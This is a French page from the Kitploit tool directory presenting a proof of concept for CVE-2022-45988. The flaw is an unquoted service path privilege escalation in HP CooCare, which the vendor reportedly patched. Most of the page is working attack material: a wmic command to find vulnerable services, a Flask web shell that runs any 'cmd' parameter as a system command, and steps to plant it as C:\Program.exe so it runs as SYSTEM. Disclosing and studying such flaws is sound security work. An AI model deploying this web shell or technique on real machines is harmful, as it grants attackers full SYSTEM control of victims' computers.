Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-45988 — CVE-2022-45988 StarSoftComm HP CooCare Une vulnérabilité d'élévation de privilèges existe | Kitploit
Outils/GitHubGitHub/happy0717/cve-2022-45988
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionExploitation de Binaires
GitHubhappy0717/cve-2022-45988

CVE-2022-45988

CVE-2022-45988 StarSoftComm HP CooCare Une vulnérabilité d'élévation de privilèges existe

Voir le dépôt
3il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-45988 StarSoftComm HP CooCare – Une vulnérabilité d'élévation de privilèges existe

####################################################

J'ai contacté hp-security-alert. Ils ont corrigé ce bug. À propos de StarSoftComm CooCare [HP-PSRT-IR #4106] image Le vendeur a répondu avec les informations suivantes :

Suivez ces étapes pour mettre à jour :

  1. Lancez eService
  2. Attendez environ 3 minutes
  3. Fermez et relancez eService à nouveau.
  4. Vérifiez que la version est v5.364 ou ultérieure.

#####################################

Une vulnérabilité d'élévation de privilèges existe dans StarSoftComm HP CooCare qui pourrait permettre à un attaquant d'élever son niveau de privilèges. e管家超级版 est un logiciel de diagnostic à distance intégré au HP Star 14 Pro, développé par StarSoftComm (软通科技).

testé sur Windows 11 22621.819, HP LAPTOP HP Pavilion Plus 14 pouces ordinateur portable 14-eh0000 (56D77AV)

Version affectée : CooCare antérieure à v5.364

#Reproduction de la vulnérabilité

#La première étape : wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ trouver le service (Utilisez la commande CMD ci-dessus pour trouver les services non référencés)

image

Le nom du service est Windows Application Management Service, aussi appelé WinAppMgmt. Le service s'appelle Windows Application Management Service, abrégé en WinAppMgmt.

image

Le service provient de StarSoftComm CooCare

image

#Étape 2 : Préparer un programme malveillant

image

root@kitploit:~
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def hello_world():
    r = request.args.getlist('cmd')  #Reception? cmd= parameter
    a=os.popen(r[0])  #Execute system commands
    l = a.read()
    return l  #return

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=14145, debug=True)  #Listen HTTP port 14145

J'utilisais python3 flask pour écrire un exe malveillant. Il peut écouter le port HTTP 14145 et exécuter des commandes système.

En utilisant la commande pyinstaller.exe --onefile --windowed -F -w python_test.py pour créer un exe malveillant.

#Étape 3 : Placer le malware dans le chemin C:\ et renommer le malware en Program.exe

image

#Étape 4 : Démarrer le service Windows Application Management Service

Si le service Windows Application Management Service est déjà démarré, vous pouvez le redémarrer

image

#Étape 5 : Attendre le démarrage du service Windows Application Management Service et exécuter les commandes système C:\Program.exe s'exécute en tant que SYSTEM

Quand je vois dans Taskmgr.exe que le service Windows Application Management Service démarre avec SYSTEM, alors je peux ouvrir le navigateur et entrer http://127.0.0.1:14145?cmd=whoami

Attendez..........

pour...

ça.

NT SYSTEM

image

Télécharger l’outil